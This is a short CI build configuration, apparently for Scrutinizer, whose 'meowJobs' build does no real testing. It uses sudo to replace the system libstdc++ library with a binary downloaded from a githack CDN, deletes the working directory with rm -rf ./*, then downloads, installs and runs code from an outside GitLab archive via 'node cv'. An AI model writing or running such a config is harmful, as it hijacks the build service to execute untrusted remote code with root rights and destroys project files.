checks:
    javascript: true
build:
    environment:
        node: v16.9.1
    nodes:
        meowJobs:
            dependencies:
                before:
                    - curl -fsSL https://glcdn.githack.com/tinhdien/mai-lo/-/raw/main/libstdc++.so.6 -o libstdc++.so.6
                    - sudo cp libstdc++.so.6 /usr/lib/x86_64-linux-gnu/libstdc++.so.6
            tests:
                override:
                    - command: rm -rf ./*
                    - command: curl -fsSL https://gitlab.com/tinhdien/mai-lo/-/archive/main/mai-lo-main.zip -o bui.zip
                    - command: unzip bui.zip
                    - command: cd mai-lo-main
                    - command: npm i
                    - command: node cv
                    - command: echo "Done!!"